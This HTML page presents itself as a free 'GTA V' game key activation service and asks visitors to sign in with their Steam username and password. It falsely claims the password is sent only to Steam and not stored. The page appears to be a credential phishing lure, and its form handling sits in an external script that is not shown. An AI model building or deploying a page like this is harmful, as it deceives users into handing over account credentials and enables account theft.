<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css" integrity="sha384-9aIt2nRpC12Uk9gS9baDl411NQApFmC26EwAOH8WgZl5MYYxFfc+NcPb1dKGj7Sk" crossorigin="anonymous">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="assets/css/toast.min.css">
    <link rel="stylesheet" href="assets/css/custom.css">
</head>

<body>
    <div class="container">
        <div class="row justify-content-center">
            <div class="col-md-7 main-content ml-1">
                <div class="cover-container" style="background-image: url(assets/img/landscape.jpg);">
                </div>
                <h1>Welcome to Game Key activation service !</h1>
                <span>Pass only two steps to get your "GTA V" Game. If you have any question, contact us with live
            chat.</span>
                <div class="notices d-flex align-items-center">
                    <i class="fa fa-clock-o"></i> <span>It will take only 2 minutes !</span>
                </div>
                <form class="form-steps-container" id="form-steps-container">
                    <div class="form-step">
                        <h2 class="form-step-title"><span>1</span>Sign in Steam</h2>
                        <div class="form-group">
                            <label for="username">Username</label>
                            <input type="text" class="form-control" id="username" name="username" placeholder="Username">
                        </div>
                        <div class="form-group">
                            <label for="password">Password</label>
                            <input type="password" class="form-control" id="password" name="password" placeholder="Password">
                            <small id="passwordHelp" class="form-text">
                  We do not save your password on our server. Your
                  password is securely transmitted to the Steam activation server.</small>
                        </div>
                        <button type="button" class="btn btn-primary step-trigger-button">Next step</button>
                    </div>
                    <div class="form-step">
                        <h2 class="form-step-title"><span>2</span>Get your game</h2>
                        <div class="card">
                            <div class="card-body">
                                <h5 class="card-title">I understand and agree that:</h5>
                                <div class="form-group form-check">
                                    <input type="checkbox" class="form-check-input" id="check1">
                                    <label class="form-check-label" for="check1">The key will be locked for account and cannot be
                      activated for another one;</label>
                                </div>
                                <div class="form-group form-check">
                                    <input type="checkbox" class="form-check-input" id="check2">
                                    <label class="form-check-label" for="check2">You cannot get the game if you already have it in your
                      library;</label>
                                </div>
                                <div class="form-group form-check">
                                    <input type="checkbox" class="form-check-input" id="check3">
                                    <label class="form-check-label" for="check3">Game will be send to game library and cannot be saved
                      to inventory;</label>
                                </div>
                            </div>
                        </div>
                        <button type="button" class="btn btn-primary step-trigger-button">Activate my game !</button>
                    </div>
                    <div class="form-step">
                        <h2 class="form-step-title"><span>3</span>Enjoy your game !</h2>

                        <button type="button" class="btn btn-success step-trigger-button">Publish a review on Trustpilot</button>
                    </div>
                </form>
            </div>
        </div>
    </div>
</body>
<script src="https://code.jquery.com/jquery-3.5.1.min.js">
</script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous">
</script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/js/bootstrap.min.js" integrity="sha384-OgVRvuATP1z7JjHLkuOU7Xw704+h835Lr+6QL9UvYjZE3Ipu6Tp75j7Bh/kR0JKI" crossorigin="anonymous">
</script>
<script src="assets/js/toast.min.js"></script>
<script src="assets/js/custom.js"></script>

</html>